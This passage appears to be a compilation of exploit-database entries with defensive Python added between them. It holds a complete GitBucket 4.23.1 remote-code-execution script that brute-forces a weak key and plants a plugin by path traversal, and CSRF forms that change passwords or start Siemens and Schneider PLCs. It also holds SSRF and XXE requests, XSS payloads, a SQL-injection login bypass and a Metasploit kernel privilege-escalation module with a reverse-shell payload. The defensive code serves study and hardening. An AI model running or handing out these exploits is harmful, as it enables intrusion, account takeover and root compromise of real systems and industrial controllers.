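    '\'"--></style></scRipt><scRipt>alert(EZK)</scRipt>',  # attribute + tag breakout
]


def strip_script_filter(value):
    """Blacklist filter of the kind the event-handler payloads are built to bypass:
    it deletes the word 'script' and nothing else."""
    return re.sub(r"script", "", value, flags=re.IGNORECASE)


def render_profile_unsafe(value):
    """Vulnerable pattern: the filtered value is concatenated into an attribute
    value and into element content without encoding for either context."""
    v = strip_script_filter(value)
    return '<input name="birthday" value="%s"><div class="about">%s</div>' % (v, v)


def render_profile_safe(value):
    """Fix: encode for the HTML context the value lands in. quote=True also
    encodes the quote characters that would end an attribute value."""
    attr = html.escape(value, quote=True)
    text = html.escape(value, quote=False)
    return '<input name="birthday" value="%s"><div class="about">%s</div>' % (attr, text)


class StructureAudit(HTMLParser):
    """Records the tag skeleton and any on* attributes a browser would see."""

    def __init__(self):
        super().__init__()
        self.tags = []
        self.event_attrs = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.event_attrs.extend(name for name, _ in attrs if name.startswith("on"))

    def handle_endtag(self, tag):
        self.tags.append("/" + tag)


EXPECTED_TAGS = ["input", "div", "/div"]  # the skeleton of the template above


def is_structurally_intact(rendered):
    """True only if untrusted data neither added tags nor introduced an event handler."""
    audit = StructureAudit()
    audit.feed(rendered)
    audit.close()
    return audit.tags == EXPECTED_TAGS and not audit.event_attrs


def classify(payloads=PAYLOADS):
    """Map each payload to (intact_with_blacklist, intact_with_encoding)."""
    return {p: (is_structurally_intact(render_profile_unsafe(p)),
                is_structurally_intact(render_profile_safe(p))) for p in payloads}


if __name__ == "__main__":
    for payload, (blacklist_ok, encoding_ok) in classify().items():
        print("%-55r blacklist: %-4s encoding: %s" % (
            payload, "safe" if blacklist_ok else "XSS", "safe" if encoding_ok else "XSS"))
```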
# Exploit Title: GitBucket 4.23.1 Unauthenticated RCE
# Date: 21-05-2018
# Software Link: https://github.com/gitbucket/gitbucket
# Exploit Author: Kacper Szurek
# Contact: https://twitter.com/KacperSzurek
# Website: https://security.szurek.pl/
# Category: remote
1. Description
Abusing a weak secret token and passing an insecure parameter to the File function.
2. Proof of Concept
import os
try:
    from Crypto.Cipher import Blowfish
except:
    print "pip install pycrypto"
    os._exit(0)
import binascii
import base64
import urllib2
import urllib
import time
import sys
import pickle

print "GitBucket 4.23.1 Unauthenticated RCE"
print "by Kacper Szurek"
print "https://security.szurek.pl/"
print "Working only when server is installed on Windows"

def PKCS5Padding(string):
    byteNum = len(string)
    packingLength = 8 - byteNum % 8
    appendage = chr(packingLength) * packingLength
    return string + appendage

def encrypt(content, key):
    content = PKCS5Padding(content)
    cipher = Blowfish.new(key, Blowfish.MODE_ECB)
    return base64.b64encode(cipher.encrypt(content))

def get_file(git_bucket_url, file, key, expiration_time):
    payload = "{} {}".format(expiration_time, file)
    authorization = encrypt(payload, key)
    url = "{}/git-lfs/aa/bb/{}".format(git_bucket_url, file)
    try:
        request = urllib2.Request(url)
        request.add_header("Authorization", authorization)
        result = urllib2.urlopen(request).read()
        return result
    except Exception, e:
        # If payload is correct and file does not exist, we got error 400
        if not "Error 500" in e.read():
            return 'OK'

def put_file(git_bucket_url, file, key, expiration_time, content):
    payload = "{} {}".format(expiration_time, file)
    authorization = encrypt(payload, key)
    url = "{}/git-lfs/aa/bb/{}".format(git_bucket_url, file)
    try:
        request = urllib2.Request(url, data=content)
        request.add_header("Authorization", authorization)
        request.get_method = lambda: 'PUT'
        result = urllib2.urlopen(request)
        return result.getcode() == 200
    except Exception, e:
        return None

def send_command(git_bucket_url, command):
    try:
        result = urllib2.urlopen("{}/exploit?{}".format(git_bucket_url, urllib.urlencode({'command' : command}))).read()
        return result
    except:
        return None

def pickle_key(url, key):
    output = open(pickle_path, "wb")
    pickle.dump({'url' : url, 'key' : key}, output)
    output.close()
    print "[+] Key pickled for further use"

def unpickle_key(url):
    if os.path.isfile(pickle_path):
        pickled_file = open(pickle_path, "rb")
        data = pickle.load(pickled_file)
        pickled_file.close()
        if data['url'] == url:
            return data['key']
    return None

if len(sys.argv) != 3:
    print "[-] Usage: exploit.py url command"
    os._exit(0)

exploit_jar = 'exploit.jar'
url = sys.argv[1]
command = sys.argv[2]
pickle_path = 'gitbucket.pickle'

if url.endswith('/'):
    url = url[0:-1]

try:
    is_gitbucket = urllib2.urlopen("{}/api/v3/".format(url), timeout=5).read()
except:
    is_gitbucket = ""

if not is_gitbucket.startswith('{"rate_limit_url"'):
    print "[-] Probably not gitbucket url: {}".format(url)
    os._exit(0)

if not os.path.isfile(exploit_jar):
    print "[-] Missing exploit file: {}".format(exploit_jar)
    os._exit(0)

expiration_time = int(round(time.time() * 1000))+(1000*6000)
print "[+] Set expire time to: {}".format(expiration_time)
print "[+] Start search blowfish key: "

for i in range(0, 10000):
    if i % 100 == 0:
        print "+",
    potential_key = unpickle_key(url)
    if potential_key:
        print "\n[+] Unpickle key, try it"
    else:
        potential_key = str(i).zfill(4)
    config_path = "non_existing_file"
    config_content = get_file(url, config_path, potential_key, expiration_time)
    if config_content:
        print "\n[+] Found blowfish key: {}".format(potential_key)
        print "[+] Config content:\n{}".format(config_content)
        exploit_path = "..\..\..\..\plugins\exploit.jar"
        f = open(exploit_jar, "rb")
        exploit_content = f.read()
        f.close()
        if put_file(url, exploit_path, potential_key, expiration_time, exploit_content):
            print "[+] Wait a few seconds for plugin load"
            time.sleep(5)
            command_content = send_command(url, "cmd /c {}".format(command))
            if command_content:
                pickle_key(url, potential_key)
                print command_content
            else:
                print "[-] Cannot execute command"
        else:
            print "[-] Cannot upload exploit.jar"
        os._exit(0)
3. Solution:
Update to version 4.24.1
https://github.com/gitbucket/gitbucket/releases/download/4.24.1/gitbucket.war
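The GitBucket entry combines two defects: an authorization token whose secret is a four-digit value that the script simply enumerates, and a file path taken from the URL and handed to the file API unchecked, so `..\..\..\..\plugins\exploit.jar` lands outside the object store. The SAP entry earlier on this page is the same second defect in a different shape (`forwardPath=/WEB-INF/web.xml`). As an added example that is neither GitBucket's nor SAP's code, the following Python shows the two server-side checks that close both: an HMAC token over the same `"<expiry> <path>"` message under a 32-byte random key, and a containment check that normalizes the path before use. The key, storage root and protected-directory list are constructed for illustration, and HMAC is a swapped-in technique, not the Blowfish scheme the exploit targets.

```python
import hashlib
import hmac
import posixpath
import secrets
import time

# Constructed server secret: 32 random bytes, not a four-digit value an attacker can enumerate.
SERVER_KEY = secrets.token_bytes(32)
OBJECT_ROOT = "lfs-objects"                      # constructed storage root
PROTECTED = ("plugins", "WEB-INF", "META-INF")   # constructed: directories no object path may touch


def make_token(key, expires_ms, object_path):
    """Issue a token bound to both the expiry and the exact path it authorizes."""
    msg = ("%d %s" % (expires_ms, object_path)).encode()
    return hmac.new(key, msg, hashlib.sha256).hexdigest()


def token_is_valid(key, token, expires_ms, object_path, now_ms=None):
    """Constant-time comparison; an expired token fails before the MAC is checked."""
    now_ms = int(time.time() * 1000) if now_ms is None else now_ms
    if expires_ms <= now_ms:
        return False
    expected = make_token(key, expires_ms, object_path)
    return hmac.compare_digest(expected, token)


def contain_object_path(user_path):
    """Return the normalized path under OBJECT_ROOT, or None if the request escapes it.
    Handles backslashes (the Windows form used by the ..\\..\\plugins\\ payload),
    absolute and drive-letter paths, and parent references, and refuses the
    protected directories by name as defense in depth."""
    if "\x00" in user_path:
        return None
    p = user_path.replace("\\", "/")
    if p.startswith("/") or ":" in p.split("/", 1)[0]:
        return None
    norm = posixpath.normpath(p)
    parts = norm.split("/")
    if norm in (".", "") or ".." in parts:
        return None
    if any(part in PROTECTED for part in parts):
        return None
    return posixpath.join(OBJECT_ROOT, norm)


def authorize_lfs_request(token, expires_ms, object_path, key=SERVER_KEY, now_ms=None):
    """Both checks must pass: the token proves who minted the request, the path
    check proves the request stays inside the object store. Returns (target, reason)."""
    if not token_is_valid(key, token, expires_ms, object_path, now_ms):
        return None, "bad or expired token"
    target = contain_object_path(object_path)
    if target is None:
        return None, "path escapes object store"
    return target, "ok"


if __name__ == "__main__":
    expiry = int(time.time() * 1000) + 60_000
    for path in ["ab/cd/abcd1234", "..\\..\\..\\..\\plugins\\exploit.jar", "/WEB-INF/web.xml"]:
        print("%-40r -> %r" % (path, authorize_lfs_request(make_token(SERVER_KEY, expiry, path), expiry, path)))
```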
# Exploit Title: Siemens SIMATIC S7-1200 CPU - Cross-Site Request Forgery
# Google Dork: inurl:/Portal/Portal.mwsl
# Date: 2018-05-21
# Exploit Author: t4rkd3vilz, Jameel Nabbo
# Vendor Homepage: https://www.siemens.com/
# Version: SIMATIC S7-1200 CPU family: All versions prior to V4.1.3
# Tested on: Kali Linux
# CVE: CVE-2015-5698
# 1. Proof of Concept
<form method="POST" action="http://targetIp/CPUCommands">
<input name="PriNav" value="Start">
<input type="submit" value="Go!">
</form>
<!--
Teradek Cube 7.3.6 CSRF Change Password Exploit
Vendor: Teradek, LLC
Product web page: https://www.teradek.com
Affected version: Firmware Version: 7.3.6 (build 26850)
Hardware Version: 1.5
Teradek Firmware Version 7.3.15
Summary: Cube packs world-class video quality into a rugged, portable
chassis for quick IP video deployments at any location. Each encoder
and decoder includes HDMI and 3G-SDI I/O, Ethernet / WiFI connectivity,
and full duplex IFB.
Desc: The application interface allows users to perform certain actions
via HTTP requests without performing any validity checks to verify the
requests. This can be exploited to perform certain actions with administrative
privileges if a logged-in user visits a malicious web site.
Tested on: lighttpd/1.4.31
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2018-5464
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5464.php
02.03.2018
-->
<html>
<body>
<form action="http://127.0.0.1/cgi-bin/system.cgi" method="POST">
<input type="hidden" name="command" value="password" />
<input type="hidden" name="pw1" value="P@ssw0rd" />
<input type="hidden" name="pw2" value="P@ssw0rd" />
<input type="hidden" name="user" value="admin" />
<input type="hidden" name="action" value="Change Password" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Teradek VidiU Pro 3.0.3 SSRF Vulnerability
Vendor: Teradek, LLC
Product web page: https://www.teradek.com
Affected version: VidiU, VidiU Mini, VidiU Pro
3.0.3r32136
3.0.2r31225
2.4.10
Summary: The Teradek VidiU gives you the freedom to broadcast live
high definition video directly to the Web without a PC. Whether you're
streaming out of a video switcher or wirelessly from your camera,
VidiU allows you to go live when you want, where you want. VidiU
offers API level integration with the Ustream, YouTube Live and
Livestream platforms, which makes streaming to your channel as
easy as logging into your account.
Desc: A server-side request forgery (SSRF) vulnerability exists in
the VidiU management interface within the RTMP settings and the Wowza
server mode functionality. The application parses user supplied data
in the GET parameters 'url' and 'xml_url' to construct a page request
that loads the configuration for a specific service. Since no validation
is carried out on the parameters, an attacker can specify an external
domain and force the application to make an HTTP request to an arbitrary
destination host, including XML data parsing (XXE potential). This can
be used by an external attacker, for example, to bypass firewalls and
initiate service and network enumeration on the internal network
through the affected application.
Tested on: lighttpd/1.4.48
lighttpd/1.4.31
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2018-5461
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5461.php
02.03.2018
--
SSRF open port:
---------------
GET /cgi-bin/wowza.cgi?command=read_url&url=zeroscience.mk:443&_=1526243349301 HTTP/1.1
Host: 127.0.0.1:8090
HTTP/1.1 200 OK
Content-Type: application/json
Connection: close
Date: Sun, 13 May 2018 21:42:30 GMT
Server: lighttpd/1.4.31
Content-Length: 31
{"error":"invalid parameters"}
SSRF closed port:
-----------------
GET /cgi-bin/wowza.cgi?command=read_url&url=zeroscience.mk:7777&_=1526243349301 HTTP/1.1
Host: 127.0.0.1:8090
HTTP/1.1 200 OK
Content-Length: 0
Connection: close
Date: Sun, 13 May 2018 21:43:30 GMT
Server: lighttpd/1.4.31
===================================================
SSRF closed port:
-----------------
GET /cgi-bin/system.cgi?command=rtmp&action=rtmp_xml_from_url&xml_url=zeroscience.mk:7777&_=1526244218671 HTTP/1.1
Host: 127.0.0.1:8090
{"result":"error", "error":"Curl error"}
SSRF open port:
---------------
GET /cgi-bin/system.cgi?command=rtmp&action=rtmp_xml_from_url&xml_url=zeroscience.mk:443&_=1526244218671 HTTP/1.1
Host: 127.0.0.1:8090
{"result":"error", "error":"Bad request"}
===================================================
PoC CSRF Blind XXE SSRF OOB:
----------------------------
<html>
<body>
<form action="http://127.0.0.1:8090/cgi-bin/system.cgi">
<input type="hidden" name="command" value="rtmp" />
<input type="hidden" name="action" value="rtmp_xml_from_url" />
<input type="hidden" name="xml_url" value="http://site.tld/xxe.xml" />
<input type="hidden" name="_" value="1526244218671" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
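The two request pairs above show why the `url` and `xml_url` parameters double as a port scanner: the response differs between an open port (443) and a closed one (7777), and the host is whatever the caller supplies. As an added example that is not Teradek's code, the following Python is the validation a fetch endpoint like this should apply before connecting: allowed scheme, no userinfo, an allowlisted port, and every resolved address public. The port policy, site names and DNS answers are constructed so the example runs offline; an allowlist of the streaming services the feature actually talks to would be the stronger control.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Constructed policy: the feature only talks to streaming services over these.
ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443, 1935}   # 1935 is RTMP

# Constructed lookup table standing in for DNS so the example runs offline.
DEMO_DNS = {
    "stream.example.com": ["93.184.216.34"],
    "wowza.corp": ["10.0.0.5"],
    "localhost": ["127.0.0.1"],
    "rebind.example": ["93.184.216.34", "169.254.169.254"],
}


def demo_resolve(host):
    if host not in DEMO_DNS:
        raise OSError("no such host: " + host)
    return DEMO_DNS[host]


def system_resolver(host):
    """Real resolver for production use: every A/AAAA answer for the host."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def is_public_address(ip):
    """Rejects loopback, RFC 1918, link-local (169.254.x, cloud metadata),
    multicast, reserved and documentation ranges."""
    addr = ipaddress.ip_address(ip)
    return addr.is_global and not addr.is_multicast


def parse_target(raw):
    """The VidiU requests pass a bare 'host:port'; give it a scheme so urlsplit
    treats the first component as a host rather than a scheme."""
    if "://" not in raw:
        raw = "http://" + raw
    return urlsplit(raw)


def check_fetch_target(raw_url, resolve=system_resolver):
    """Return (allowed, reason). Every resolved address must be public, and the
    caller must connect to one of those addresses rather than resolving again
    (otherwise a DNS rebinding answer could slip past this check)."""
    parts = parse_target(raw_url)
    if parts.scheme not in ALLOWED_SCHEMES:
        return False, "scheme %r not allowed" % parts.scheme
    if parts.username is not None or parts.password is not None:
        return False, "userinfo not allowed"
    host = parts.hostname
    if not host:
        return False, "missing host"
    try:
        port = parts.port or (443 if parts.scheme == "https" else 80)
    except ValueError:
        return False, "malformed port"
    if port not in ALLOWED_PORTS:
        return False, "port %d not allowed" % port
    try:
        ipaddress.ip_address(host)        # IP literal: no lookup needed
        addresses = [host]
    except ValueError:
        try:
            addresses = resolve(host)
        except OSError:
            return False, "unresolvable host"
    if not addresses:
        return False, "unresolvable host"
    for ip in addresses:
        if not is_public_address(ip):
            return False, "%s resolves to non-public %s" % (host, ip)
    return True, "ok"


if __name__ == "__main__":
    for target in ["stream.example.com:443", "stream.example.com:7777", "wowza.corp:443",
                   "http://localhost/cgi-bin/system.cgi", "http://169.254.169.254/",
                   "http://rebind.example/", "file:///etc/passwd"]:
        print("%-40s %s" % (target, check_fetch_target(target, demo_resolve)))
```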
<!--
Teradek VidiU Pro 3.0.3 CSRF Change Password Exploit
Vendor: Teradek, LLC
Product web page: https://www.teradek.com
Affected version: VidiU, VidiU Mini, VidiU Pro
3.0.3 (build 32136)
3.0.2 (build 31225)
2.4.10
Summary: The Teradek VidiU gives you the freedom to broadcast live
high definition video directly to the Web without a PC. Whether you're
streaming out of a video switcher or wirelessly from your camera,
VidiU allows you to go live when you want, where you want. VidiU
offers API level integration with the Ustream, YouTube Live and
Livestream platforms, which makes streaming to your channel as
easy as logging into your account.
Desc: The application interface allows users to perform certain
actions via HTTP requests without performing any validity checks
to verify the requests. This can be exploited to perform certain
actions with administrative privileges if a logged-in user visits
a malicious web site.
Tested on: lighttpd/1.4.48
lighttpd/1.4.31
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2018-5460
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5460.php
02.03.2018
-->
<html>
<body>
<form action="http://127.0.0.1:8090/cgi-bin/password.cgi">
<input type="hidden" name="pw1" value="P@ssw0rd" />
<input type="hidden" name="pw2" value="P@ssw0rd" />
<input type="hidden" name="user" value="admin" />
<input type="submit" value="Initiate" />
</form>
</body>
</html>
# Exploit Title: Auto Dealership & Vehicle Showroom WebSys 1.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery / Admin panel Authentication bypass
# Date: 2018-05-21
# Exploit Author: Borna nematzadeh (L0RD) or borna.nematzadeh123@gmail.com
# Vendor Homepage: https://codecanyon.net/item/auto-dealership-vehicle-showroom-websys/17013273?s_rank=28
# Version: 1.0
# Tested on: Kali linux
# Description: Auto Dealership & Vehicle Showroom WebSys 1.0 suffers from multiple vulnerabilities:
# POC 1 : Persistent cross site scripting :
1) After creating an account, go to your profile.
2) Navigate to "Update profile" and put this payload:
"/><script>alert(document.cookie)</script>
3) You will have an alert box in the page.
# POC 2 : CSRF :
# An attacker can change the user's authentication details directly:
# User's CSRF exploit :
<html>
<head>
<title>CSRF POC</title>
</head>
<body>
<form action="http://vehicle.thesoftking.com/updateprofile" method="post">
<input type="hidden" name="name" value="anything">
<input type="hidden" name="mobile" value="200000">
<input type="hidden" name="address" value="anything">
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
# Admin page CSRF exploit :
<form action="http://vehicle.thesoftking.com/admin/setgeneral.php" method="post">
<input name="name" value="test" type="hidden">
<input name="wcmsg" value="test" type="hidden">
<input name="address" value="test2" type="hidden">
<input name="mobile" value="2000000" type="hidden">
<input name="email" value="test@test.com" type="hidden">
<input name="currency" value="decode" type="hidden">
</form>
<script>
document.forms[0].submit();
</script>
# POC 3 : Authentication bypass :
Path : /admin
Username : ' or 0=0 #
Password : anything
# Exploit Title: Schneider Electric PLCs - Cross-Site Request Forgery
# Date: 2018-05-12
# Exploit Author: t4rkd3vilz
# Vendor Homepage: http://www.schneider-electric.com/
# Tested on: Windows
# CVE: CVE-2013-0663
# Version: Schneider Electric Quantum PLC: 140NOE77111, 140NOE77101, 140NWM10000
# Modicon M340 PLC: BMXNOC0401, BMXNOE0100x, BMXNOE011xx
# Premium PLC: TSXETY4103, TSXETY5103, and TSXWMY100
# Category: webapps
<html>
<head>
<title>CSRF POC</title>
</head>
<body>
<form method="get" action="http://TargetIP/secure/embedded/builtin" name="sample" onSubmit="return validateForm()">
<table border="0" cellspacing="0" cellpadding="0" width="300" style="height: 100" bgcolor="#C0C0C0">
<tr>
<td class="inputCell" width="200">
<div align="left">
<h5>Name:</h5>
<script language="javascript" type="text/javascript">
<!--//
paramLang();
switch(getLanguage())
{
default:
document.write("Username :"); break;
}
//-->
</script>
</div>
</td>
<td class="inputCell" width="190">
<input type="text" name="user" size="20">
</td>
</tr>
<tr>
<td class="inputCell" width="200">
<div align="left">
<h5>Pass:</h5>
<script language="javascript" type="text/javascript">
<!--//
switch(getLanguage())
{
default:
document.write("New password :"); break;
}
//-->
</script>
</div>
</td>
<td class="inputCell" width="190">
<input type="password" name="passwd" size="20">
</td>
</tr>
<tr>
<td class="inputCell" width="200">
<div align="left">
<h5>Verify Pass:</h5>
<script language="javascript" type="text/javascript">
<!--//
switch(getLanguage())
{
default:
document.write("Confirm password :"); break;
}
//-->
</script>
</div>
</td>
<td class="inputCell" width="190">
<input type="password" name="cnfpasswd" size="20">
</td>
</tr>
</table>
<br>
<div align="center">
<script language="javascript" type="text/javascript">
<!--//
switch(getLanguage())
{
default:
document.write('<input type="submit" name="subhttppwd" value="Change Password">'); break;
}
//-->
</script>
<input type="submit" name="subhttppwd" value="Change Password">
</div>
</form>
<br>
</body>
</html>
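Every CSRF proof of concept on this page (Superfood, DamnFacts, Auto Dealership, the Teradek Cube and VidiU password forms, the Siemens and Schneider PLC forms) works the same way: the browser attaches the victim's session or credentials, and the server never checks where the request originated. As an added example that is not part of any of these advisories, the following Python shows the server-side checks that refuse them: a synchronizer token bound to the session, an Origin/Referer check, and a rule that state changes must use POST (the PLC and VidiU forms use GET, which no token scheme can protect). The secret, site origin and endpoint list are constructed for illustration.

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit

CSRF_SECRET = secrets.token_bytes(32)   # constructed; a real app loads this from config
SITE_ORIGIN = "https://app.example"     # constructed origin of the protected site
# Constructed list of state-changing endpoints, using the paths the POCs post to.
STATE_CHANGING = {"/updateprofile", "/admin/setgeneral.php",
                  "/cgi-bin/password.cgi", "/secure/embedded/builtin"}


def _mac(session_id, nonce):
    msg = ("%s:%s" % (session_id, nonce)).encode()
    return hmac.new(CSRF_SECRET, msg, hashlib.sha256).hexdigest()


def issue_csrf_token(session_id):
    """Token to embed in the site's own forms: random nonce plus a MAC that binds
    it to this session, so a token stolen or minted elsewhere does not validate."""
    nonce = secrets.token_hex(16)
    return nonce + "." + _mac(session_id, nonce)


def csrf_token_matches(session_id, token):
    try:
        nonce, mac = token.split(".", 1)
    except (AttributeError, ValueError):
        return False
    return hmac.compare_digest(_mac(session_id, nonce), mac)


def origin_of(url):
    p = urlsplit(url)
    return "%s://%s" % (p.scheme, p.netloc) if p.scheme and p.netloc else None


def source_origin_ok(headers):
    """Origin header wins; fall back to Referer; no header at all is treated as
    cross-site, which is what the hidden-form POCs look like to the server."""
    origin = headers.get("Origin")
    if origin is not None:
        return origin == SITE_ORIGIN
    referer = headers.get("Referer")
    if referer is not None:
        return origin_of(referer) == SITE_ORIGIN
    return False


def check_state_change(request):
    """Return (allowed, reason). `request` is a dict with method, path, headers,
    form and session_id (the server-side session or authenticated principal)."""
    if request["path"] not in STATE_CHANGING:
        return True, "not a protected endpoint"
    if request["method"] != "POST":
        return False, "state change must use POST"
    if not source_origin_ok(request["headers"]):
        return False, "cross-site origin"
    if not csrf_token_matches(request["session_id"], request["form"].get("csrf_token")):
        return False, "missing or invalid CSRF token"
    return True, "ok"


if __name__ == "__main__":
    sid = "sess-constructed-1"
    # What the auto-submitting form on this page produces: the victim's session, but a
    # foreign Origin and no token.
    forged = {"method": "POST", "path": "/updateprofile", "session_id": sid,
              "headers": {"Origin": "http://attacker.example"},
              "form": {"name": "anything", "mobile": "1000000000", "address": "anything"}}
    legit = {"method": "POST", "path": "/updateprofile", "session_id": sid,
             "headers": {"Origin": SITE_ORIGIN},
             "form": {"name": "Alice", "csrf_token": issue_csrf_token(sid)}}
    print("forged:", check_state_change(forged))
    print("legit: ", check_state_change(legit))
```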
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
  Rank = GreatRanking

  include Msf::Post::File
  include Msf::Post::Linux::Priv
  include Msf::Post::Linux::System
  include Msf::Post::Linux::Kernel
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Reliable Datagram Sockets (RDS) Privilege Escalation',
      'Description' => %q{
        This module exploits a vulnerability in the rds_page_copy_user function
        in net/rds/page.c (RDS) in Linux kernel versions 2.6.30 to 2.6.36-rc8
        to execute code as root (CVE-2010-3904).

        This module has been tested successfully on Fedora 13 (i686) with
        kernel version 2.6.33.3-85.fc13.i686.PAE and Ubuntu 10.04 (x86_64)
        with kernel version 2.6.32-21-generic.
      },
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'Dan Rosenberg', # Discovery and C exploit
          'Brendan Coles'  # Metasploit
        ],
      'DisclosureDate' => 'Oct 20 2010',
      'Platform' => [ 'linux' ],
      'Arch' => [ ARCH_X86, ARCH_X64 ],
      'SessionTypes' => [ 'shell', 'meterpreter' ],
      'Targets' => [[ 'Auto', {} ]],
      'Privileged' => true,
      'References' =>
        [
          [ 'AKA', 'rds-fail.c' ],
          [ 'EDB', '15285' ],
          [ 'CVE', '2010-3904' ],
          [ 'BID', '44219' ],
          [ 'URL', 'https://securitytracker.com/id?1024613' ],
          [ 'URL', 'https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=799c10559d60f159ab2232203f222f18fa3c4a5f' ],
          [ 'URL', 'http://vulnfactory.org/exploits/rds-fail.c' ],
          [ 'URL', 'http://web.archive.org/web/20101020044047/http://www.vsecurity.com/resources/advisory/20101019-1/' ],
          [ 'URL', 'http://web.archive.org/web/20101020044048/http://www.vsecurity.com/download/tools/linux-rds-exploit.c' ],
        ],
      'DefaultOptions' =>
        {
          'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp',
          'WfsDelay' => 10,
          'PrependFork' => true
        },
      'DefaultTarget' => 0))
    register_options [
      OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', %w(Auto True False) ]),
      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),
    ]
  end

  def base_dir
    datastore['WritableDir'].to_s
  end

  def modules_disabled?
    modules_disabled = cmd_exec('cat /proc/sys/kernel/modules_disabled').to_s.strip
    (modules_disabled.eql?('1') || modules_disabled.eql?('2'))
  end

  def upload(path, data)
    print_status "Writing '#{path}' (#{data.size} bytes) ..."
    rm_f path
    write_file path, data
    register_file_for_cleanup path
  end

  def upload_and_chmodx(path, data)
    upload path, data
    cmd_exec "chmod +x '#{path}'"
  end

  def upload_and_compile(path, data)
    upload "#{path}.c", data
    output = cmd_exec "gcc -o #{path} #{path}.c"
    unless output.blank?
      print_error output
      fail_with Failure::Unknown, "#{path}.c failed to compile"
    end
    cmd_exec "chmod +x #{path}"
    register_file_for_cleanup path
  end

  def exploit_data(file)
    path = ::File.join Msf::Config.data_directory, 'exploits', 'cve-2010-3904', file
    fd = ::File.open path, 'rb'
    data = fd.read fd.stat.size
    fd.close
    data
  end

  def live_compile?
    return false unless datastore['COMPILE'].eql?('Auto') || datastore['COMPILE'].eql?('True')

    if has_gcc?
      vprint_good 'gcc is installed'
      return true
    end

    unless datastore['COMPILE'].eql? 'Auto'
      fail_with Failure::BadConfig, 'gcc is not installed. Compiling will fail.'
    end
  end

  def check
    version = kernel_release
    unless Gem::Version.new(version.split('-').first) >= Gem::Version.new('2.6.30') &&
           Gem::Version.new(version.split('-').first) < Gem::Version.new('2.6.37')
      vprint_error "Linux kernel version #{version} is not vulnerable"
      return CheckCode::Safe
    end
    vprint_good "Linux kernel version #{version} appears to be vulnerable"

    unless cmd_exec('/sbin/modinfo rds').to_s.include? 'Reliable Datagram Sockets'
      vprint_error 'RDS kernel module is not available'
      return CheckCode::Safe
    end
    vprint_good 'RDS kernel module is available'

    if modules_disabled?
      unless cmd_exec('/sbin/lsmod').to_s.include? 'rds'
        vprint_error 'RDS kernel module is not loadable'
        return CheckCode::Safe
      end
    end
    vprint_good 'RDS kernel module is loadable'

    CheckCode::Appears
  end

  def exploit
    unless check == CheckCode::Appears
      fail_with Failure::NotVulnerable, 'Target is not vulnerable'
    end

    if is_root?
      fail_with Failure::BadConfig, 'Session already has root privileges'
    end

    unless cmd_exec("test -w '#{base_dir}' && echo true").include? 'true'
      fail_with Failure::BadConfig, "#{base_dir} is not writable"
    end

    # Upload exploit executable
    executable_name = ".#{rand_text_alphanumeric rand(5..10)}"
    executable_path = "#{base_dir}/#{executable_name}"
    if live_compile?
      vprint_status 'Live compiling exploit on system...'
      upload_and_compile executable_path, exploit_data('rds-fail.c')
    else
      vprint_status 'Dropping pre-compiled exploit on system...'
      arch = kernel_hardware
      case arch
      when /amd64|ia64|x86_64|x64/i
        upload_and_chmodx executable_path, exploit_data('rds-fail.x64')
      when /x86|i[3456]86/
        upload_and_chmodx executable_path, exploit_data('rds-fail.x86')
      else
        fail_with Failure::NoTarget, "No pre-compiled binaries are available for system architecture: #{arch}"
      end
    end

    # Upload payload executable
    payload_path = "#{base_dir}/.#{rand_text_alphanumeric rand(5..10)}"
    upload_and_chmodx payload_path, generate_payload_exe

    # Launch exploit
    print_status 'Launching exploit...'
    output = cmd_exec "#{executable_path} #{payload_path}"
    output.each_line { |line| vprint_status line.chomp }
  end
end